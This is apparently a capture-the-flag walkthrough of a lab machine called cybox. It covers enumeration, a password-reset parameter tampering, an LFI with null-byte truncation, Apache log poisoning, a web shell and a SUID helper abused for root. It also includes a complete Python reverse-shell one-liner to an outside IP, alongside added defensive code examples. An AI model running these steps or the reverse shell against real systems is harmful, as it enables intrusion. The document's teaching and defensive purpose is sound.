Enumeration

Determining the IP address

Host discovery with nmap:

nmap -sn 10.1.1.0/24

Nmap scan report for 10.1.1.69
Host is up (0.00087s latency).

The machine's IP is 10.1.1.69.

Port scanning and service enumeration

Run a full TCP port scan, enumerating service and operating-system information at the same time:

nmap -vv --reason -Pn -A --osscan-guess --version-all -p- 10.1.1.71

PORT    STATE  SERVICE    REASON         VERSION
21/tcp  open   ftp        syn-ack ttl 63 vsftpd 3.0.3
25/tcp  open   smtp       syn-ack ttl 63 Postfix smtpd
|_smtp-commands: cybox.Home, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| ssl-cert: Subject: commonName=cybox
| Issuer: commonName=cybox
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-10T23:31:36
| Not valid after:  2030-11-08T23:31:36
| MD5:   597f 372b e5a8 d37c 0b02 df9b b844 c7fc
| SHA-1: baab 1a0e b21f b0d1 dfa3 344d cfe6 4596 eeeb 2b53
| -----BEGIN CERTIFICATE-----
| MIICsDCCAZigAwIBAgIJAPemEpSJPIGYMA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
| BAMMBWN5Ym94MB4XDTIwMTExMDIzMzEzNloXDTMwMTEwODIzMzEzNlowEDEOMAwG
| A1UEAwwFY3lib3gwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCur26I
| g0/5XNlxCRzMhsE+QaCcBvXUiqyH63k9hKLE9fU0/aOK27ndifAuyNxXKrQ8+O3k
| vVialMdL+acQApma4gZJHGFkdvg4IW8NO6qddqzONOuDW95M8mkGg1TjtuSbr8DN
| 51XkXdpyrqnYNRGcCEPUcsaLxXJ2hi5y2eF/NwRM66LO1cDlktJt+BxV5rwoVJPo
| LGcZDACLytNnTX+gQ4mDP8QlufMyuPlahCiXS+qX2ccyOl6o/57APBJHSuzxdN6R
| YbxEOEGChAI/Ti2Ye0ys8YsRwuJEXA+5HJhjsroCWQ+cyE6LJILvIeB+/KrHd6u2
| UwDCuxlzym114ABdAgMBAAGjDTALMAkGA1UdEwQCMAAwDQYJKoZIhvcNAQELBQAD
| ggEBAEIgTyVioUoDSK87vneqsuGiufdoYu73Z37tL0utmiMELwEes7xniUIFu1zg
| 0Y5l/WXbJpzySnsiDiEivdwYWe5+duXgSA/dOdcaercfumoTiZEwxf26emGbRxz9
| UmYBgTfTZ0GB7RYLCH1IB84Uoli2HC517fCUwwCjdM+hoStShzsESUpQTBDqBTFC
| zyzbuCZ4GsEqYkwzHgSU6LDMkXPhwAdo6+KM/0vkj7hfJGi6mSKBuO7wKTqyip+n
| pXPTBHBxqR7V/idE1nANqbgSS6vs244eNb3Ze07d08Q3gG7ZkLzQ6+bsEDzmfjMx
| oKO+c/GYcn4CLfYiUB4NlVw/KaA=
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
53/tcp  closed domain     reset ttl 63
80/tcp  open   http       syn-ack ttl 63 Apache httpd 2.2.17 ((Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15)
|_http-favicon: Unknown favicon MD5: 8B6163E0FDACC85E807F80A78F59C03C
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15
|_http-title: CYBOX
110/tcp open   pop3       syn-ack ttl 63 Courier pop3d
|_pop3-capabilities: LOGIN-DELAY(10) IMPLEMENTATION(Courier Mail Server) UIDL USER PIPELINING TOP
143/tcp open   imap       syn-ack ttl 63 Courier Imapd (released 2011)
|_imap-capabilities: UIDPLUS THREAD=ORDEREDSUBJECT ACL SORT QUOTA CAPABILITY IDLE NAMESPACE IMAP4rev1 completed OK ACL2=UNIONA0001 CHILDREN THREAD=REFERENCES
443/tcp open   ssl/https? syn-ack ttl 63
| ssl-cert: Subject: commonName=cybox.company/organizationName=Cybox Company/stateOrProvinceName=New York/countryName=US/organizationalUnitName=Cybox/emailAddress=admin@cybox.company/localityName=New York City
| Issuer: commonName=cybox.company/organizationName=Cybox Company/stateOrProvinceName=New York/countryName=US/organizationalUnitName=Cybox/emailAddress=admin@cybox.company/localityName=New York City
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-14T15:06:32
| Not valid after:  2021-11-14T15:06:32
| MD5:   1308 6ffe 0aa0 d469 6464 2d4d dbab dd48
| SHA-1: 7a0a d33a 9fc1 b469 295b abc6 8157 bf7b 0788 1a93
| -----BEGIN CERTIFICATE-----
| MIIEDTCCAvWgAwIBAgIJANgoERjVeZGaMA0GCSqGSIb3DQEBCwUAMIGcMQswCQYD
| VQQGEwJVUzERMA8GA1UECAwITmV3IFlvcmsxFjAUBgNVBAcMDU5ldyBZb3JrIENp
| dHkxFjAUBgNVBAoMDUN5Ym94IENvbXBhbnkxDjAMBgNVBAsMBUN5Ym94MRYwFAYD
| VQQDDA1jeWJveC5jb21wYW55MSIwIAYJKoZIhvcNAQkBFhNhZG1pbkBjeWJveC5j
| b21wYW55MB4XDTIwMTExNDE1MDYzMloXDTIxMTExNDE1MDYzMlowgZwxCzAJBgNV
| BAYTAlVTMREwDwYDVQQIDAhOZXcgWW9yazEWMBQGA1UEBwwNTmV3IFlvcmsgQ2l0
| eTEWMBQGA1UECgwNQ3lib3ggQ29tcGFueTEOMAwGA1UECwwFQ3lib3gxFjAUBgNV
| BAMMDWN5Ym94LmNvbXBhbnkxIjAgBgkqhkiG9w0BCQEWE2FkbWluQGN5Ym94LmNv
| bXBhbnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvPtZ4QjR8jiCf
| EenYyF+0zX72cdgQcats/xI1xNChoRLYHWfCvHAtKRWW2ZA6LcneysORaUEX3CLY
| yR+Rbb47g7opbFkcjunYl/cqnij7MjPahhCfaHlmtFTGax/r1ILsQaDdot/E6Roo
| t0bAZtY+BXbGnjTj2GuBIi4G21mG3AE8MUOFwgKjN/Ig1XpCY7K9DMhXRI2q3EJ9
| 4soZcurTHPgO82qZMH6pBJ3fAdpWHKl9mtjXN7K9gdefTcVUrU1ygcFI1jOe6ebo
| 54pCt3w87zYpN/HYgleKnekgmMJaL67OWYsasdMtV1wyPjEfDKy0xsfAlX1Tyj1k
| UU7VQxRBAgMBAAGjUDBOMB0GA1UdDgQWBBThC+vjCQchxqk6u4Gax+vIcTo5pzAf
| BgNVHSMEGDAWgBThC+vjCQchxqk6u4Gax+vIcTo5pzAMBgNVHRMEBTADAQH/MA0G
| CSqGSIb3DQEBCwUAA4IBAQAl8T47VopXOWecFZ8To6dZ5KLccaSIREaLFZBhFRqV
| AgB28SSF67QKb2gNWtPfqLNCThPEFV8tt5/khbZrPBKakvgwv7IoV4X6UoLY6JNz
| y6y8nYDYmVZ2/HnY34urRWtOgmg7pvkwqymr60+QWfnzOoweV961Nddi4QQs4Fpv
| 1TOm22I0AyQxrSxNZ/NrnG80EXq19Vr8w6/1sJTY4Iy1J5HZjO3To+fOfFB7IEd3
| 41cyClnCQK4U07VW7ygJU25polKFA7S8RhglgwMpXoEgr4XQkPViJwrBRVZrowYr
| XYWBRJlhg+T+VU6YY7a8kmYhLJEfAOCorIipjfbZRwwd
|_-----END CERTIFICATE-----
|_ssl-date: 2021-06-26T02:13:35+00:00; -1s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_DES_192_EDE3_CBC_WITH_MD5
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.11 - 4.1

Quite a few ports are open: 21, 25, 80, 110, 143 and 443.
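Added example, not part of the original write-up: a small Python triage script that parses the port lines of nmap's normal output and flags what a defender would act on in the results above, namely end-of-life software branches (Apache httpd 2.2, OpenSSL 0.9.8 and PHP 5.2 no longer receive vendor security fixes), services that authenticate in cleartext, SSLv2 and HTTP TRACE. The sample scan text is a constructed excerpt of the findings above, and the rule lists are my own choices rather than anything nmap emits.

```python
import re

# Constructed sample in the layout of nmap's normal output, built from the
# findings shown above (a handful of lines, not the full captured scan).
SAMPLE_SCAN = """\
PORT    STATE  SERVICE    REASON         VERSION
21/tcp  open   ftp        syn-ack ttl 63 vsftpd 3.0.3
25/tcp  open   smtp       syn-ack ttl 63 Postfix smtpd
53/tcp  closed domain     reset ttl 63
80/tcp  open   http       syn-ack ttl 63 Apache httpd 2.2.17 ((Unix) mod_ssl/2.2.17 OpenSSL/0.9.8o DAV/2 PHP/5.2.15)
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
110/tcp open   pop3       syn-ack ttl 63 Courier pop3d
143/tcp open   imap       syn-ack ttl 63 Courier Imapd (released 2011)
443/tcp open   ssl/https? syn-ack ttl 63
| sslv2:
|   SSLv2 supported
"""

# One port line: "<port>/<proto> <state> <service> <reason> [ttl N] [version...]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?:\s+ttl\s+\d+)?)\s*(?P<version>.*)$"
)

# Software branches that no longer receive vendor security fixes.
EOL_BRANCHES = ("Apache httpd 2.2", "OpenSSL/0.9.8", "PHP/5.2")
# Services whose logins travel in cleartext unless TLS/STARTTLS is enforced.
CLEARTEXT_AUTH = {"ftp", "pop3", "imap"}
# NSE script-output fragments that point at a weak configuration.
SCRIPT_FLAGS = {
    "SSLv2 supported": "SSLv2 enabled",
    "Potentially risky methods: TRACE": "HTTP TRACE enabled",
}


def parse_ports(text):
    """Return (port, state, service, version) for every port line in the report."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports.append((int(m["port"]), m["state"], m["service"], m["version"].strip()))
    return ports


def triage(text):
    """Return sorted (port, finding) pairs a defender would want to act on.

    Script-output lines (starting with '|') are attributed to the most recent
    port line, which is how nmap nests them in its normal output.
    """
    findings = []
    current_port = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current_port = int(m["port"])
            if m["state"] != "open":
                continue
            for branch in EOL_BRANCHES:
                if branch in m["version"]:
                    findings.append((current_port, f"end-of-life software: {branch}"))
            if m["service"] in CLEARTEXT_AUTH:
                findings.append((current_port, f"cleartext-auth service: {m['service']}"))
        elif line.startswith("|") and current_port is not None:
            for needle, label in SCRIPT_FLAGS.items():
                if needle in line:
                    findings.append((current_port, label))
    return sorted(findings)


if __name__ == "__main__":
    for port, finding in triage(SAMPLE_SCAN):
        print(f"{port:>5}  {finding}")
```

Run against the scan above it reports the cleartext FTP/POP3/IMAP listeners, the three end-of-life components behind port 80, TRACE on 80 and SSLv2 on 443; feeding it a full `nmap -oN` file works the same way because closed ports and unrelated script output are skipped.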

Port 80 enumeration

The home page looks like this:

[screenshot: index]

The bottom of the page shows the administrator's e-mail address admin@cybox.company, so the machine's domain is presumably cybox.company; add it to /etc/hosts.

Directory scanning found nothing, so move on to enumerating subdomains:

gobuster vhost -u cybox.company -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt

Found: dev.cybox.company (Status: 200) [Size: 209]
Found: webmail.cybox.company (Status: 302) [Size: 0]
Found: monitor.cybox.company (Status: 302) [Size: 0]
Found: register.cybox.company (Status: 200) [Size: 1252]
Found: ftp.cybox.company (Status: 200) [Size: 5295]

Five subdomains found; add each to /etc/hosts for further enumeration.

dev.cybox.company

There is a phpinfo page, which gives away some information such as the directory Apache is deployed in:

[screenshot: phpinfo]

webmail.cybox.company

SquirrelMail; no credentials for now.

monitor.cybox.company

Another login page, and registration is possible:

[screenshot: monitor]

register.cybox.company

Apparently used to register users:

[screenshot: register]

ftp.cybox.company

Web-based FTP and SSH clients:

[screenshot: ftp]

Initial Shell

First try every page that allows user registration. After registering on the register page, one can log in to SquirrelMail. After registering on the monitor page there seems to be nothing one can do:

[screenshot: departure]

Just as things looked hopeless, I noticed that the monitor page has a forgot-password option. Entering the e-mail address of the account registered on the register page, a mail did indeed arrive:

[screenshot: reset_mail]

The e-mail address appears in the URL, and it is the only parameter. Changing it to admin@cybox.company, opening the page, resetting and logging in all succeeded; the page is indeed different from an ordinary registered user's. Looking at the source:

[screenshot: admin_panel]
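The reset flow just abused trusts an e-mail address supplied in the URL, so whoever edits that parameter chooses which account gets reset. As an added example, my own code rather than anything from the target application, here is the shape of a reset flow that does not have this weakness: the link carries only a random, single-use, expiring token, the account is resolved server-side from the token, and only a hash of the token is stored. The in-memory USERS table and the example.test addresses are constructed for the demo.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed in-memory account table standing in for the application's database.
USERS = {
    "alice@example.test": {"password_hash": None},
    "admin@example.test": {"password_hash": None},
}


def hash_password(password, salt=None):
    """Salted PBKDF2 hash; returns (salt, digest) so verification can reuse the salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return salt, digest


def verify_password(password, stored):
    salt, digest = stored
    return hmac.compare_digest(hash_password(password, salt)[1], digest)


class TokenReset:
    """Password reset where the link carries only an unguessable, single-use token.

    The account is looked up server-side from the token, so there is no e-mail
    parameter for a client to edit. Only sha256(token) is kept, so a leaked
    pending-reset table does not let anyone forge a valid link.
    """

    TTL_SECONDS = 900  # links stop working after 15 minutes

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._pending = {}       # sha256(token) -> (email, expires_at)

    def request(self, email):
        """Create a token for the address on file, or None for unknown addresses.

        The caller must send the same "if that address exists, a mail is on its
        way" response in both cases so the endpoint does not reveal accounts.
        """
        if email not in USERS:
            return None
        token = secrets.token_urlsafe(32)
        key = hashlib.sha256(token.encode()).hexdigest()
        self._pending[key] = (email, self._now() + self.TTL_SECONDS)
        return token

    def complete(self, token, new_password):
        """Consume the token and set the password; False on unknown or expired token."""
        key = hashlib.sha256(token.encode()).hexdigest()
        entry = self._pending.pop(key, None)   # pop: a token is good exactly once
        if entry is None:
            return False
        email, expires_at = entry
        if self._now() > expires_at:
            return False
        USERS[email]["password_hash"] = hash_password(new_password)
        return True
```

The e-mail address is used exactly once, inside `request`, to decide where the mail goes; nothing the client sends in the second step can name an account. Rate-limiting `request` per address and per source IP belongs in front of this, but is outside the scope of the demo.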

One line references style.php, which is very likely an LFI. A quick test confirmed it; a simple %00 truncation is enough:

[screenshot: LFI]
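For contrast, an added example (my own code, not the site's style.php) of how a stylesheet selector can resolve a user-supplied name without becoming an LFI. The %00 truncation works on this box because PHP 5.2 passed paths to the C library, where the string ends at the first null byte (PHP 5.3.4 and later reject paths containing a null byte). The resolver below refuses null bytes outright, allows only a fixed character set, and checks that the resolved real path stays inside the styles directory. The temporary styles directory it builds is a constructed fixture.

```python
import os
import re
import tempfile

# Only names of this shape are ever turned into a path; everything else is
# refused before any filesystem call happens (no '/', '.', ':' or '%').
STYLE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")


def resolve_style(base_dir, name):
    """Map a user-supplied style name to a file inside base_dir, or return None."""
    if "\x00" in name:                   # null-byte truncation stops here
        return None
    if not STYLE_NAME.fullmatch(name):   # no traversal characters can get through
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name + ".css"))
    # Defence in depth: even if the allowlist were loosened later, the resolved
    # path must remain inside base_dir (realpath also collapses symlinks).
    if os.path.commonpath([base, candidate]) != base:
        return None
    if not os.path.isfile(candidate):
        return None
    return candidate


def build_demo_dir():
    """Constructed fixture: a styles directory with two real stylesheets and a
    file outside it that must never be reachable through resolve_style."""
    root = tempfile.mkdtemp(prefix="styles-demo-")
    styles = os.path.join(root, "styles")
    os.mkdir(styles)
    for stem in ("default", "dark"):
        with open(os.path.join(styles, stem + ".css"), "w") as fh:
            fh.write("body { }\n")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("not a stylesheet\n")
    return styles


if __name__ == "__main__":
    styles = build_demo_dir()
    for requested in ("default", "dark", "missing", "../secret", "../secret.txt\x00"):
        print(repr(requested), "->", resolve_style(styles, requested))
```

The allowlist alone would already block every input in the demo; the realpath containment check is there so that a future "let users pick sub-directories" change cannot silently reintroduce traversal.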

The next idea is log poisoning. Using the Apache path /opt/bitnami/apache2/ obtained earlier from the phpinfo page, after some probing the Apache access log turned out to be readable at /opt/bitnami/apache2/logs/access_log.

This Apache instance serves ftp.cybox.company, and the resources in access.log basically match the page:

[screenshot: ftp_network]

Then poison the log; in the end, placing the PHP statement in the User-Agent header works:

[screenshot: user_agent]
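Poisoning works because the access log stores client-supplied headers verbatim. As an added example that is not part of the write-up, here is a Python scanner for Apache combined-format logs that flags PHP open tags in any client-controlled field (request line, Referer, User-Agent) and traversal sequences or null bytes in the request, which is the trace the log-poisoning-plus-LFI sequence above leaves behind. The log lines are constructed samples, not the target's access_log, and the tag in them is a harmless `echo`.

```python
import re

# Apache "combined" log format:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?$'
)
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
TRAVERSAL = re.compile(r"\.\./|%2e%2e%2f|%00", re.IGNORECASE)

# Constructed sample lines (not a real capture): line 1 is ordinary browsing,
# line 2 carries a PHP tag in the User-Agent, line 3 shows traversal plus a
# null byte in the query string, line 4 hides the tag in the Referer, and
# line 5 is junk that does not parse at all.
SAMPLE_LOG = """\
10.1.1.50 - - [26/Jun/2021:02:13:35 +0000] "GET /index.php HTTP/1.1" 200 5295 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.1.1.50 - - [26/Jun/2021:02:14:01 +0000] "GET / HTTP/1.1" 200 5295 "-" "<?php echo 1; ?>"
10.1.1.50 - - [26/Jun/2021:02:14:20 +0000] "GET /style.php?style=../../../secret%00 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.1.1.50 - - [26/Jun/2021:02:15:02 +0000] "GET / HTTP/1.1" 200 5295 "<?= 1 ?>" "Mozilla/5.0"
this line is not in combined format
"""


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def scan_log(text):
    """Return (line_no, field, reason) alerts for lines worth a second look."""
    alerts = []
    for n, line in enumerate(text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            # Unparseable lines are reported rather than dropped: a log that
            # stops matching its own format is itself a signal.
            alerts.append((n, "line", "not in combined log format"))
            continue
        # Every quoted field is written verbatim from the client's request, so
        # each of them is a place where a code tag could be planted.
        for field in ("request", "referer", "agent"):
            if PHP_OPEN_TAG.search(rec[field] or ""):
                alerts.append((n, field, "PHP open tag in client-supplied field"))
        if TRAVERSAL.search(rec["request"]):
            alerts.append((n, "request", "path traversal or null byte in request"))
    return alerts


if __name__ == "__main__":
    for line_no, field, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {field}: {reason}")
```

In practice the same two regexes run well as a filter rule in whatever ships the logs; the point of reporting on the referer and request line as well as the User-Agent is that all three reach the log file through the same unfiltered path.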

Writing a one-line web shell, commands execute successfully:

[screenshot: ifconfig]

Python is present on the machine, so use it to spawn a reverse shell with the following command:

python+-c+'import+socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.17.48",443));os.dup2(s.fileno(),0);+os.dup2(s.fileno(),1);+os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Initial shell obtained:

[screenshot: initial]

Privilege escalation

Look for SUID binaries on the machine:

find / -perm -4000 2>/dev/null

/usr/bin/chfn
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/at
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/opt/registerlauncher
/bin/mount
/bin/ping
/bin/fusermount
/bin/umount
/bin/ping6
/bin/su
/bin/ntfs-3g

Download /opt/registerlauncher and inspect its logic:

[screenshot: ghidra]

It simply calls /opt/register, whose logic is to create a user with the given name, with a group of the same name, and the name must not collide with an existing user. There is no user named sudo on the machine, so create a sudo user and escalate to root:

[screenshot: root]
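Added example, my own code rather than the decompiled /opt/register: what the helper's name check should have looked like. It validates a requested login name against existing users and existing groups (plus a short reserved list), because a privileged helper that creates a same-named group for every new user and only checks existing users will accept a name that matches an existing privileged group, which is what lets a user called sudo through above. The passwd/group excerpts are constructed, not copied from the machine.

```python
import re

# Constructed excerpts in /etc/passwd and /etc/group layout (the name is the
# first colon-separated field); not copied from the target machine.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
cybox:x:1000:1000::/home/cybox:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
adm:x:4:
sudo:x:27:
www-data:x:33:
cybox:x:1000:
"""

# Names that grant privileges by convention and must never be self-assigned,
# whether or not they currently exist on the system.
RESERVED = {"root", "sudo", "wheel"}
# Portable login-name shape: lowercase, starts with a letter or underscore,
# at most 32 characters.
LOGIN_NAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def names_from_db(text):
    """Extract the name field from passwd/group style text, skipping comments."""
    return {line.split(":", 1)[0] for line in text.splitlines()
            if line and not line.startswith("#")}


def validate_new_username(name, users, groups):
    """Decide whether a helper may create `name` together with a same-named group.

    Returns (ok, reason). The group check is the one the helper above lacks:
    without it, any name that already exists as a group is accepted, and the
    new account ends up associated with that existing group.
    """
    if not LOGIN_NAME.fullmatch(name):
        return False, "invalid characters or length"
    if name in RESERVED:
        return False, "reserved name"
    if name in users:
        return False, "user exists"
    if name in groups:
        return False, "group exists"
    return True, "ok"


def load_system_names(passwd_path="/etc/passwd", group_path="/etc/group"):
    """Read the real databases when available; falls back to the constructed samples."""
    try:
        with open(passwd_path) as fh:
            users = names_from_db(fh.read())
        with open(group_path) as fh:
            groups = names_from_db(fh.read())
    except OSError:
        users, groups = names_from_db(SAMPLE_PASSWD), names_from_db(SAMPLE_GROUP)
    return users, groups


if __name__ == "__main__":
    users, groups = names_from_db(SAMPLE_PASSWD), names_from_db(SAMPLE_GROUP)
    for requested in ("alice", "sudo", "adm", "cybox", "Alice"):
        print(requested, "->", validate_new_username(requested, users, groups))
```

Checking against `getent group` output rather than a static list would also catch groups supplied by NSS sources other than /etc/group; the logic stays the same, only `names_from_db` changes its input.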